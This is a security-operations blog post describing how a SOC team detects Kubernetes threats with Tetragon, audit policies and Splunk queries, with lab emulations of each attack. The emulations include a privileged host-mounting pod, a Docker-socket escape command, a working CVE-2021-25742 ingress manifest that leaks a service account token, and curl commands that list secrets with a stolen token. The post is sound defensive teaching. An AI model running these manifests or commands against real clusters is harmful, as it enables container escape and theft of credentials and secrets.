Threat Detection in the K8s Environment

Anton Medvedev
Published in Exness Tech Blog
Jul 4, 2024

In today’s digital landscape, securing data and applications is crucial for organizations of all sizes, especially with technologies like Kubernetes (K8s) transforming application development, deployment, and scalability.

Kubernetes is a popular open-source container management system that automates the deployment, scaling, and management of containerized applications. While it offers flexibility, scalability, and reliability, it also introduces new security challenges. Protecting business-critical applications and sensitive data in Kubernetes is essential for the Blue Team, as attackers increasingly target K8s environments. Threat Intelligence reports detail attacker tactics, and the security community develops new tools and guidelines, such as CIS Kubernetes Benchmarks, to enhance K8s security.

In this article, the Exness SOC (Security Operations Center) team shares our approaches to monitoring and detecting threats in the K8s environment. We discuss the tools and event types we use to detect malicious activity on our clusters and provide examples of detection rules that might be useful for adversary detection.

Our weapons

Endpoint Agent

There are many open-source and commercial agent security solutions for monitoring your Kubernetes environment. After a long period of testing various solutions, we chose the open-source Tetragon tool.

As with almost every security tool, Tetragon has advantages and drawbacks that you should know while planning your monitoring strategy.

Here are its main advantages:

  • Power of eBPF: eBPF programs run in kernel context, providing efficient access to system parts and handling kernel events with minimal latency. They can also receive telemetry from containers in Kubernetes clusters.
  • Open Source: Tetragon, being open source, allows adding features, enriching events, and hooking on syscalls to detect advanced adversary techniques.
  • Community Contribution: The security community actively improves Tetragon, enhancing stability, fixing bugs, and adding functionality.
  • Raw Telemetry Collection: Unlike solutions like Falco that rely on predefined rules, Tetragon collects raw telemetry, enabling coverage of new threats, retrospective analysis, threat hunting, and security investigations.
  • Universal Monitoring Agent: Tetragon is also effective for monitoring activity on regular Linux hosts outside Kubernetes clusters.

But there are also drawbacks you should be aware of in advance:

  • Open Source: You need a dedicated team to enhance features, fix bugs, and maintain updates across multiple *nix hosts.
  • Lack of Cutting-edge Features: Unlike commercial solutions, Tetragon lacks AI and Threat Intelligence features. However, you can develop these yourself.
  • Lack of Prevention: Tetragon doesn’t terminate malicious processes, quarantine files, or block C2 connections, requiring investment in R&D to add these features.
  • Lack of Response: Tetragon lacks incident response features like host isolation, remote shell, and forensic artifact collection.
  • Telemetry Overload: Collecting raw telemetry generates massive data volumes, requiring processing in your SIEM and potentially causing performance issues on source hosts.

At Exness, we enhanced Tetragon with the following features:

  • Binary Hash Calculation: Useful for checking IoCs presence in infrastructure.
  • Container Event Enrichment: Docker-inspected information is added to every container’s event, extending detection coverage and providing more context during investigations and incident response.
  • User Enrichment: We enriched every event with additional user information, such as the user’s home folder, shell, etc.
  • Agent-side Events Filtering: Events are filtered on the agent side to save the host’s performance, significantly reduce collected event flow, and control SIEM costs.

Soon, we plan to open-source our Tetragon fork to share it with the community.
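
If you would like to experiment with the upstream version before building your own enhancements, a minimal deployment sketch looks like this (assuming the documented Helm chart and the tetra CLI; the release and namespace names are up to you):

# Add the Cilium Helm repository and deploy the Tetragon DaemonSet
helm repo add cilium https://helm.cilium.io
helm repo update
helm install tetragon cilium/tetragon -n kube-system

# Stream the exported JSON events in a human-readable form (requires the tetra CLI)
kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f | tetra getevents -o compact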

Kubernetes Audit

The endpoint agent provides great visibility, but how can we monitor all the activity inside containers in K8s clusters?

We need to detect threats at the Kubernetes level and understand who launched a service or application, under which role, and from where.

Here a built-in feature comes to the rescue: the Kubernetes audit log. Most actions in a K8s cluster go through the “kube-apiserver” component. Kubernetes allows users to implement an audit policy and granularly log calls to specific resources, select only certain methods, and apply many other filters. Of course, you can collect all events, but then this source generates an incredible number of them. To address this issue, we use a custom Kubernetes audit policy with the following parameters:

apiVersion: audit.k8s.io/v1
kind: Policy
omitStages:
  - "RequestReceived"
rules:

  # Exclude all activity related to the Lease resource, as it is not required for attack detection and incident investigation.
  # The use of Lease in Kubernetes allows for the implementation of efficient and reliable leader election mechanisms and coordination between application instances.
  - level: None
    resources:
      - group: "coordination.k8s.io"
        resources: ["leases"]

  # Discard events from the kube-proxy account that watch the "endpoints" and "services" resources.
  - level: None
    users: ["system:kube-proxy"]
    verbs: ["watch"]
    resources:
      - group: ""
        resources: ["endpoints", "services"]

  # Discard events from the kube-controller-manager, kube-scheduler, and kube-system services related to "get" and "update" operations on the "endpoints" resource in the kube-system namespace.
  - level: None
    users:
      - system:kube-controller-manager
      - system:kube-scheduler
      - system:serviceaccount:kube-system:endpoint-controller
    verbs: ["get", "update"]
    namespaces: ["kube-system"]
    resources:
      - group: ""
        resources: ["endpoints"]

  # Omit apiserver account events with the "get" action on the "namespaces" resource.
  - level: None
    users: ["system:apiserver"]
    verbs: ["get"]
    resources:
      - group: ""
        resources: ["namespaces"]

  # Don't log authenticated requests to certain non-resource URL paths.
  - level: None
    userGroups: ["system:authenticated"]
    nonResourceURLs:
      - "/api*"
      - "/version"
      - "/healthz*"
      - "/metrics*"

  # Don't log subjectaccessreviews from metrics-server and system:node.
  - level: None
    users: ["system:serviceaccount:kube-system:metrics-server", "system:node"]
    resources:
      - group: "authorization.k8s.io"
        resources: ["subjectaccessreviews", "selfsubjectaccessreviews"]

  # Secrets and ConfigMaps at the Metadata level.
  - level: Metadata
    resources:
      - group: ""
        resources: ["secrets", "configmaps"]
      - group: "authentication.k8s.io"
        resources: ["tokenreviews"]

  # Omit other events:
  - level: None
    resources:
      - group: ""
        resources: ["events"]
      - group: "events.k8s.io"
        resources: ["events"]

  # Read operations at the Metadata level.
  - level: Metadata
    verbs: ["get", "list", "watch"]
    resources:
      - group: ""
      - group: "apps"
      - group: "batch"
      - group: "certificates.k8s.io"
      - group: "rbac.authorization.k8s.io"
      - group: "admissionregistration.k8s.io"
      - group: "authorization.k8s.io"

  # Log RequestResponse for can-i events:
  - level: RequestResponse
    resources:
      - group: "authorization.k8s.io"
        resources: ["selfsubjectaccessreviews", "selfsubjectrulesreviews"]

  # Log RequestResponse for RBAC modification events:
  - level: RequestResponse
    resources:
      - group: "rbac.authorization.k8s.io"
        resources: ["clusterrolebindings", "clusterroles", "rolebindings", "roles"]

  # Main rule for crucial resources:
  - level: Request
    resources:
      - group: ""
        resources: ["limitranges", "namespaces", "nodes", "persistentvolumeclaims", "persistentvolumes", "podtemplates", "resourcequotas", "serviceaccounts", "pods", "pods/exec", "pods/attach", "pods/ephemeralcontainers"]
      - group: "apps"
        resources: ["daemonsets", "deployments", "replicasets", "statefulsets"]
      - group: "batch"
        resources: ["jobs"]
      - group: "certificates.k8s.io"
        resources: ["certificatesigningrequests"]
      - group: "admissionregistration.k8s.io"
        resources: ["mutatingwebhookconfigurations", "validatingwebhookconfigurations"]
      - group: "authorization.k8s.io"

  # Default level for all other requests.
  - level: Metadata

You can use this policy to filter out the activity of various “noisy” services and, conversely, make sure the events you are interested in are logged.
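
For the policy to take effect, the kube-apiserver must be pointed at the policy file and at an audit backend. A sketch of the relevant flags (the file paths and rotation values here are illustrative, not our production settings):

kube-apiserver \
  --audit-policy-file=/etc/kubernetes/audit-policy.yaml \
  --audit-log-path=/var/log/kubernetes/audit/audit.log \
  --audit-log-maxage=30 \
  --audit-log-maxbackup=10 \
  --audit-log-maxsize=100
  # alternatively, ship events straight to a collector/SIEM:
  # --audit-webhook-config-file=/etc/kubernetes/audit-webhook.yaml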

Now that we have briefly described telemetry sources and tools for the K8s environment, we can move on to the most interesting part: threat detection!

CES (Common Event Schema)

To efficiently search in SIEM across all event sources, we use CES (Common Event Schema). CES abstracts “raw” events and fields from various sources, mapping them into a common format. This process, though challenging, is a valuable long-term investment that increases SOC efficiency.

For example, if you have the IP address of a C2 server, CES allows you to search for all connections to this IP across different infrastructure components without remembering all raw field names. Similarly, to check account activity, CES simplifies searching across multiple event sources with a common “user name” field.

Using CES, you can create concise searches like “index=* src_ip=<C2 address>” or “index=* user_name=<Malicious user name>,” streamlining detection and investigation. All threat detection rules in this article will use our intuitive CES. Now, let’s look at threat detection!

Threat Detection

System binary renaming

MITRE: T1036.003

MS K8s Matrix: -

Event source: Tetragon

Consider the activity of the TeamTNT group, known for attacking virtual and cloud infrastructures. They scan external subnets for poorly configured or vulnerable services, exploit them, and deploy malicious payloads. A Cado Security report describes how TeamTNT exploited misconfigured Docker hosts. Similarly, a Kubernetes master node with anonymous access exposed to the Internet could be compromised. TeamTNT gained unauthorized access to the Docker daemon and launched their container.

a script fragment executed within the deployed container

The attacker tried to find and rename system utilities to evade signature-based detection.

Let's emulate this activity. We have created a new “alpine-shell” Pod with the “alpine” image and renamed the Wget system tool inside the container.
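
The emulation boils down to two commands, roughly the following (a sketch; the Pod and file names match the event shown below):

# Start an interactive Pod from the alpine image
kubectl run alpine-shell --image=alpine -it -- sh

# Inside the container: rename the wget binary to evade name-based signatures
mv /usr/bin/wget /usr/bin/evil_wget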

For detection, we can use the following query:

index=tetragon event{}="FileRename"
(
file_path_old IN ("/usr/bin/*","/bin/*","/usr/sbin/*","/sbin/*") OR
(proc_cwd IN ("/usr/bin*","/bin*","/usr/sbin*","/sbin*") AND NOT file_path_old="*/*") OR
file_path_old IN (
"*/mkdir",
"*/wget",
"*/nc",
"*/netcat",
"*/cd",
"*/chmod",
"*/curl",
"*/ps",
"*/ls",
"*/netstat",
"*/kill",
"*/pkill",
"*/rm",
"*/cat",
"*/vim",
"*/ssh",
"*/chattr",
"*/chmod",
"*/iptables"
)
)
  • file_path_old IN (“/usr/bin/*”,”/bin/*”,”/usr/sbin/*”,”/sbin/*”) searches for file renaming events in the /usr/bin/, /bin/, /usr/sbin/, /sbin/ directories.
  • proc_cwd IN (“/usr/bin*”,”/bin*”,”/usr/sbin*”,”/sbin*”) AND NOT file_path_old=”*/*” covers a specific Tetragon behavior: when a renaming operation is performed from within the directory containing the file, the file_path_old field contains only the renamed file’s name instead of its full path. In that case, we rely on the proc_cwd field, which indicates the current working directory of the running process.
  • file_path_old IN (“*mkdir”,”*wget”, …) covers scenarios where an attacker has downloaded a LOLBin utility to any non-system directory and tries to rename it.

As a result of the search, we can observe the event:

{
agent_uid: test-c08d3638e4a009872977a60f1909663b
cmdline: /usr/bin/wget /usr/bin/evil_wget
container_bind: [
/var/lib/kubelet/pods/b465922b-ef22-4478-971a-27b00d15407d/volumes/kubernetes.io~secret/default-token-9v29s:/var/run/secrets/kubernetes.io/serviceaccount:ro
/var/lib/kubelet/pods/b465922b-ef22-4478-971a-27b00d15407d/etc-hosts:/etc/hosts
/var/lib/kubelet/pods/b465922b-ef22-4478-971a-27b00d15407d/containers/alpine-shell/d0155c82:/dev/termination-log
]
container_create_time: 2024-04-18T14:27:23.15949393Z
container_img_name: alpine@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
container_is_privileged: false
container_is_rofs: false
container_name: alpine-shell
container_namespace_cgroup: host
container_namespace_ipc: container:c2892b77577af3610321a2e23bdb55b4146fb227a9d1dc788b2f8d9691424656
container_namespace_net: container:c2892b77577af3610321a2e23bdb55b4146fb227a9d1dc788b2f8d9691424656
container_uid: 0ecd3f994d2b3a4fdde23670033666cad96a3fafb98a96bb803c7b0289ff372e
event: [
FileRename
]
event_description: Tetragon __x64_sys_renameat2 event.
event_type: __x64_sys_renameat2
event_utc_time: 2024-04-18T14:27:34.023246451Z
file_path: /usr/bin/evil_wget
file_path_old: /usr/bin/wget
host_ip: 10.130.8.242
host_name: itesc-testebpf-k8s-01.test.env
k8s_namespace: default
k8s_pod_name: alpine-shell
proc_cap: [
CAP_CHOWN
DAC_OVERRIDE
CAP_FOWNER
CAP_FSETID
CAP_KILL
CAP_SETGID
CAP_SETUID
CAP_SETPCAP
CAP_NET_BIND_SERVICE
CAP_NET_RAW
CAP_SYS_CHROOT
CAP_MKNOD
CAP_AUDIT_WRITE
CAP_SETFCAP
]
proc_cwd: /
proc_file_name: mv
proc_file_path: /bin/mv
proc_flags: execve rootcwd clone
proc_gp_uid: OjExMjMyNjkyNTAyNDY2MToxMDgy
proc_id: 1363
proc_p_auid: 4294967295
proc_p_cwd: /
proc_p_file_md5: ffe99296d0d826a4b27cc8812403965a
proc_p_file_name: sh
proc_p_file_path: /bin/sh
proc_p_flags: execve rootcwd clone
proc_p_id: 1104
proc_p_user_cwd: /root
proc_p_user_gid: 0
proc_p_user_name: root
proc_p_user_uid: 0
proc_p_start_time: 2024-04-18T14:27:23.288875447Z
proc_p_uid: OjExMjMyNzAwNDcyOTI3OToxMTA0
proc_start_time: 2024-04-18T14:27:34.023246664Z
proc_uid: OjExMjMzNzczOTEwMDcxMzoxMzYz
proc_user_auid: 4294967295
proc_user_cwd: /root
proc_user_gid: 0
proc_user_name: root
proc_user_uid: 0
}

The event contains a wealth of useful information, such as the name of the launched Pod (k8s_pod_name), K8s namespace (k8s_namespace), user-initiator of the activity (proc_user_*), process-related data (proc_*), details about the launched container (container_*) and more.

As a SOC Analyst, you might want to know which account this Pod was created under. The answer can be easily obtained using Kube API events:

index=kube_api
action=create obj_tgt_type=Pod obj_tgt_name=alpine-shell
{
action: create
agent_uid: test-76064bc0c2c6faa4ef89dd3f2a0fb3ed
event: [
HTTPReq
]
event_description: Kubernetes audit log. Raw input.
event_result: allow
event_type: ResponseComplete
event_uid: 31f707f2-ddc5-4250-8408-ebd48b5bbf31
event_utc_time: 2024-04-18T14:27:23.11944791Z
host_ip: 10.130.8.244
host_name: itesc-testebpf-k8s-03.test.env
http_code: 201
k8s_namespace: default
k8s_pod_labels: {
run: alpine-shell
}
obj_name: alpine-shell
obj_tgt_name: alpine-shell
obj_tgt_type: Pod
obj_type: pods
requestObject: {
apiVersion: v1
spec: {
containers: [
{
container_args: [
sh
]
container_img_name: alpine
container_name: alpine-shell
imagePullPolicy: Always
stdin: true
stdinOnce: true
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
tty: true
}
]
dnsPolicy: ClusterFirst
enableServiceLinks: true
restartPolicy: Always
schedulerName: default-scheduler
terminationGracePeriodSeconds: 30
}
}
src_ip: [
10.130.8.242
]
uri_path: /api/v1/namespaces/default/pods?fieldManager=kubectl-run
user_client: kubectl/v1.24.3 (linux/amd64) kubernetes/aef86a9
user_group: [
system:masters
system:authenticated
]
user_name: kube-admin
}

A kube API event indicates that a pod named alpine-shell was created by the k8s user kube-admin with the IP address 10.130.8.242 (itesc-testebpf-k8s-01.test.env). In the requestObject field, we can see the full description of the created Pod, which can be useful for incident investigation. The event was generated on the master node itesc-testebpf-k8s-03.test.env (field host_name). Thus, we have gathered all the information we need to respond to the incident.

As you can see, with Tetragon, most rules that detect malicious activity on regular hosts also work well for containers.

Privileged container is detected

MITRE: T1068

MS K8s Matrix: MS-TA9018

Event source: Tetragon

Using privileged containers in Kubernetes clusters poses a significant security risk. These containers have elevated access to the host system, making them exploitable by attackers who can break out to the underlying OS. Attackers can also use privileged containers to evade detection and manipulate host resources.

Preventing such incidents is better than dealing with the aftermath. Mechanisms like Admission Controllers, Security Contexts for Pods, and developer security training can help. However, real-world implementation can be challenging, so additional monitoring is beneficial.
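
As an example of the preventive side, the built-in Pod Security Admission controller can reject privileged Pods at the namespace level (a sketch; “my-namespace” is a placeholder):

# Enforce the "restricted" Pod Security Standard for a namespace:
# privileged containers and hostPath mounts will be rejected at admission time
kubectl label namespace my-namespace \
  pod-security.kubernetes.io/enforce=restricted \
  pod-security.kubernetes.io/warn=restricted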

Here’s a query to detect a new privileged container:

index=tetragon
event{}="ProcessCreate"
container_uid=*
(
container_is_privileged=true OR
container_namespace_ipc=host OR
container_namespace_net=host OR
container_namespace_pid=host OR
container_bind{}="/:*" OR
container_dev{}.PathOnHost="/dev/sda*" OR
proc_cap{}="CAP_SYS_ADMIN"
)
NOT (k8s_namespace=kube-system container_name IN (<priv_container_1>,priv_container_2,...))

Let’s have a closer look at the request conditions:

  • container_is_privileged=true — The container was launched with the “privileged” flag.
  • container_namespace_*=host — The running container has access to the host namespace, so an attacker can access the underlying operating system.
  • container_bind{}=”/:*” — This line describes a scenario where the attacker mounts the root of the host filesystem into the container, thus gaining access to all files.
  • container_dev{}.PathOnHost=”/dev/sda*” — The attacker mounts the host disk device inside the container, gaining access to the filesystem.
  • proc_cap{}=”CAP_SYS_ADMIN” — The process was launched with the “CAP_SYS_ADMIN” capability. Of course, other capabilities allow an attacker to escape from the container, such as CAP_SYS_PTRACE, CAP_SYS_CHROOT, etc., but they are often used by legitimate containers.
  • NOT (k8s_namespace=kube-system container_name IN (<priv_container_1,priv_container_2>,..)) — The kube-system namespace contains numerous system services that require elevated privileges and access to system resources. Therefore, we exclude the activity of containers operating in this namespace. It is better to explicitly specify a list of containers to exclude instead of excluding all kube-system namespace activity. Otherwise, malicious workloads created by an attacker may be missed.

Next, we will create a privileged Pod with the following manifest:

apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
spec:
  containers:
  - name: evil-container
    image: alpine
    command: ["wget", "https://pastebin.com/GizpPKtU"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: rootfs-volume
      mountPath: /hostfs
  volumes:
  - name: rootfs-volume
    hostPath:
      path: /

As a result, we get an event recording the creation of a privileged container named “evil-container”.

In cases where an organization doesn’t closely monitor the configuration of exposed services and neglects common security practices, you can use this type of query as a hypothesis that should be periodically validated during threat-hunting exercises.

Suspicious execution activity inside a container

MITRE: T1611

MS K8s Matrix: MS-TA9006

Event source: Tetragon

Attackers inside a container can exploit configuration errors like:

  • Mounted Docker Socket: If insecure, attackers can connect to the socket, create a privileged container, and escape to the host system (see the sketch after this list).
  • Privileged Account Kubeconfig in K8S Resource: With this file, attackers can access the Kubernetes API and create privileged resources, allowing an escape to the host system.
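
The first scenario can be reproduced with nothing but the standard Docker client. A sketch, assuming the host’s /var/run/docker.sock is mounted into the compromised container:

# Talk to the host's Docker daemon through the mounted socket,
# start a privileged container with the host filesystem mounted,
# and chroot into it - effectively escaping to the underlying node
docker -H unix:///var/run/docker.sock run --rm -it --privileged -v /:/host alpine chroot /host /bin/sh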

Attackers usually use existing clients like Docker or kubectl for these exploits. To detect such activity, use the following Splunk query:

index=tetragon
event{} IN (ProcessCreate,Connection)
(
(proc_file_name=kubectl cmdline IN ("*create*pod*","*create*deployment*","*create*daemonset*","*create*statefulset*","*exec *","*run *")) OR
(proc_file_name=docker cmdline IN ("*run *","*exec*"))
)
container_name=*

The discovered events indicate that the kubectl utility was executed within the evil-container container to create a privileged Pod named evil-pod. Additionally, you can see that the network connection to the Kube API was initiated by kubectl.

The cluster-admin role is bound to the user

MITRE: T1098

MS K8s Matrix: MS-TA9019

Event source: Kube API audit

Let’s consider a scenario where an attacker fully compromises the cluster and decides to entrench themselves in the system by creating an additional privileged account. The new account will likely be bound to the ‘cluster-admin’ role immediately, which grants full control over the entire cluster environment and resources.

There are also situations where a new user is granted ‘cluster-admin’ privileges right away instead of dealing with RBAC's granular configuration. Excessive privileges pose a significant security risk.
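
Emulating this persistence step takes a single command (a sketch; the binding and account names match the detection example below, and the “default” namespace is an assumption):

# Bind the built-in cluster-admin ClusterRole to a service account
kubectl create clusterrolebinding anakin-cluster-admin \
  --clusterrole=cluster-admin \
  --serviceaccount=default:anakin.skywalker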

The following search query may detect such activity:

index=kube_api obj_tgt_type=ClusterRoleBinding action="create" requestObject.roleRef.name="cluster-admin"
NOT (user_name="system:apiserver" requestObject.subjects{}.name="system:masters")

The search result is shown below:

The user kube-admin created a ClusterRoleBinding resource named anakin-cluster-admin and granted the service account anakin.skywalker the role of Kubernetes cluster administrator.

Suspicious workload creation in kube-system namespace

MITRE: T1610

MS K8s Matrix: MS-TA9008

Event source: Kube API audit

An attacker may attempt to mimic a legitimate service by adding a malicious workload to the kube-system namespace (having proper privileges for that). Using a behavior-based threat detection approach, we should filter out legitimate activity, leaving only anomalous events. Since every company uses its own Kubernetes services, your list of workload resources may differ.

Let’s create a search to detect this activity:

index=kube_api
action=create
k8s_namespace=kube-system
obj_type IN (daemonsets statefulsets deployments)
NOT obj_name IN (calico-kube-controllers,calico-node,coredns,kube-proxy,dns-autoscaler)
NOT requestObject.spec.template.spec.containers{}.container_img_name IN ("registry.k8s.io/coredns/coredns*","registry.k8s.io/kube-proxy*")

kubectl create deployment not-evil-service --image=alpine --namespace=kube-system creates a malicious deployment. Let’s find traces of this activity using the search query described earlier:

As a result, we can see that in the kube-system namespace, the user kube-admin created a Deployment named legitimate-application.

CVE-2021-25742

MITRE: T1068

MS K8s Matrix: -

Event source: Kube API audit

Vulnerability CVE-2021-25742 allows an account with permission to create Ingress resources to craft a malicious ingress resource and access the ‘system:serviceaccount:ingress-nginx:ingress-nginx’ service account token. This account, in turn, grants access to all secrets across the cluster. More details about this vulnerability can be found here.

To create the malicious ingress, we will use manifest:

apiVersion: v1
kind: Service
metadata:
  name: evil-ingress-service
spec:
  type: ExternalName
  externalName: kubernetes.default
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: evil-ingress
  annotations:
    nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
    nginx.ingress.kubernetes.io/server-snippet: |
      set_by_lua $token '
        local file = io.open("/run/secrets/kubernetes.io/serviceaccount/token")
        if not file then return nil end
        local content = file:read "*a"
        file:close()
        return content
      ';

      location = /token {
        content_by_lua_block {
          ngx.say(ngx.var.token)
        }
      }
spec:
  rules:
  - host: asgard.host
    http:
      paths:
      - backend:
          service:
            name: evil-ingress-service
            port:
              number: 443
        path: /
        pathType: Prefix

The process of obtaining the nginx account token using the evil-ingress resource:

As you can see, the ingress-nginx service account token was obtained after successfully creating the ‘evil-ingress’ resource.

The vulnerability exploitation can be detected with the following search:

index=kube_api action=create obj_tgt_type=Ingress ("serviceaccount/token" AND "io.open")

The creation of a malicious ingress resource was detected. We recommend keeping your clusters up to date (even though the vulnerability is old). If updating your cluster to the latest version is impossible, you can add the necessary restrictions to your Admission Controller configuration.
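
Recent ingress-nginx releases can also be told to reject snippet annotations entirely, which closes this particular vector. A sketch (the ConfigMap name and namespace correspond to a default installation and may differ in your environment):

# Disable server-snippet / configuration-snippet annotations in the ingress-nginx controller
kubectl -n ingress-nginx patch configmap ingress-nginx-controller \
  --type merge -p '{"data":{"allow-snippet-annotations":"false"}}'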

Privilege discovery by service account

MITRE: T1069

MS K8s Matrix: MS-TA9029

Event source: Kube API audit

Let’s continue with our previous scenario and consider the attacker’s actions after obtaining service account token access. Before taking the next step, an attacker needs to discover their permissions. To do so, they can directly query the API or use the ‘auth can-i’ function of the kubectl utility that interacts with the same API.

For example, the attacker tries to determine if the ingress-nginx service account has “list” permissions for all secrets in the cluster. The following command can be used for this:

curl -k -H "Authorization: Bearer <SERVICE_ACCOUNT_SECRET_TOKEN>" -H "Content-Type: application/json" -X POST -d '{"kind":"SelfSubjectAccessReview","apiVersion":"authorization.k8s.io/v1","spec":{"resourceAttributes":{"verb":"list","resource":"secrets"}}}' https://10.130.8.242:6443/apis/authorization.k8s.io/v1/selfsubjectaccessreviews

The response from the Kube API server tells us that the ingress-nginx account has the appropriate permissions.
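
The same check can be performed with the kubectl ‘auth can-i’ helper mentioned above (a sketch using the same token and API server address):

# Ask the API server whether the current token may list secrets cluster-wide
kubectl auth can-i list secrets --all-namespaces \
  --server=https://10.130.8.242:6443 \
  --token="<SERVICE_ACCOUNT_SECRET_TOKEN>" \
  --insecure-skip-tls-verify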

Having these permissions, an attacker will take advantage of them. Since they don’t have GET permissions, they cannot directly retrieve the contents of a specific secret. But thanks to the list method, an attacker can request all secrets stored in the default namespace (and any other namespaces). The following command is used for this:

curl -k -H "Authorization: Bearer <SERVICE_ACCOUNT_SECRET_TOKEN>" https://10.130.8.242:6443/api/v1/namespaces/default/secrets

The response from the Kube API shows the contents of the secrets stored in the default namespace.

It was not a good idea to store our secrets in this cluster

This search will show us current privilege discovery activity under service accounts:

index=kube_api user_name="system:serviceaccount:*" obj_type IN ("selfsubjectrulesreviews","selfsubjectaccessreviews")

Depending on the technology stack you use, such activity may be normal for some service accounts. Let’s search for the events:

As a result, suspicious discovery activity on the ingress-nginx service account was detected.

Suspicious discovery activity

MITRE: T1613

MS K8s Matrix: MS-TA9029

Event source: Kube API audit

Continuing the previous compromise scenario of an account, let’s consider a case where the attacker performs reconnaissance of the current environment and permissions but now uses automation tools or direct access to Kubernetes objects (kubectl get). Most often, a compromised account does not have administrative privileges in the cluster (if it does, then setting your LinkedIn account status to “OpenToWork” may be the best Incident Response activity). Therefore, as part of the discovery activity, you may observe requests for resources that are prohibited for the current user.

For example, there is a service account called unicorn-sa, located in the unicorn-land namespace. The account has permissions only to read secrets within the same namespace.
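
For reference, a lab setup reproducing such an account might look like this (a sketch; the role and binding names are illustrative, and only the namespace and service account names come from the scenario):

# Service account that may only read secrets within its own namespace
kubectl create namespace unicorn-land
kubectl create serviceaccount unicorn-sa -n unicorn-land
kubectl create role secret-reader --verb=get,list --resource=secrets -n unicorn-land
kubectl create rolebinding unicorn-sa-secret-reader --role=secret-reader \
  --serviceaccount=unicorn-land:unicorn-sa -n unicorn-land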

You may imagine an attacker gaining access to GitLab, where a token for the unicorn-sa account is stored in one of the projects. The attacker's next step is conducting a reconnaissance of the cluster environment. For instance, using the KubiScan utility, the attacker can obtain a ready-made list of risky RoleBindings, Roles, etc. The malicious actor can exploit misconfigurations in security settings and gain higher privileges with this information.
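
You can emulate this kind of reconnaissance without any third-party tooling: a few kubectl requests under the stolen token are enough (a sketch; the API server address and token are placeholders):

# Each request to a resource the account cannot read produces a Forbidden audit event
for resource in clusterroles roles rolebindings pods deployments secrets; do
  kubectl get "$resource" --all-namespaces \
    --server=https://10.130.8.242:6443 \
    --token="<UNICORN_SA_TOKEN>" \
    --insecure-skip-tls-verify
done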

Here’s an example query displaying the result if an account created more than five requests to resources it is not allowed to access:

index=kube_api event_reason=Forbidden
| stats earliest(event_utc_time) AS event_utc_time
values(host_name) AS host_name
values(http_code) AS http_code
values(action) AS action
values(user_client) AS user_client
values(src_ip{}) AS src_ip{}
values(obj_type) AS obj_type
count by user_name
| where count > 5

Now, we can see the following event:

The service account unicorn-sa requested a list of clusterroles, pods, rolebindings, and roles objects. There are cases where some monitoring services access cluster resources to retrieve metrics. As a result, we may get false positives. To make the rule more accurate, we can explicitly specify a list of resources that interest attackers the most, for example — obj_type IN (deployments,secrets,pods,…).

Conclusion

With Kubernetes’ growing popularity, securing its infrastructure is increasingly important as it becomes a prime target for attackers. Critical business applications in Kubernetes environments heighten hackers’ motivation.

We described how we monitor Kubernetes clusters to detect various adversary techniques and believe sharing knowledge among defenders is crucial. We also showed, through examples, how to detect threats in K8S environments. Knowing your infrastructure well improves threat response and mitigates business risks.

Thank you for your attention. We will continue sharing our knowledge and experience with the community.
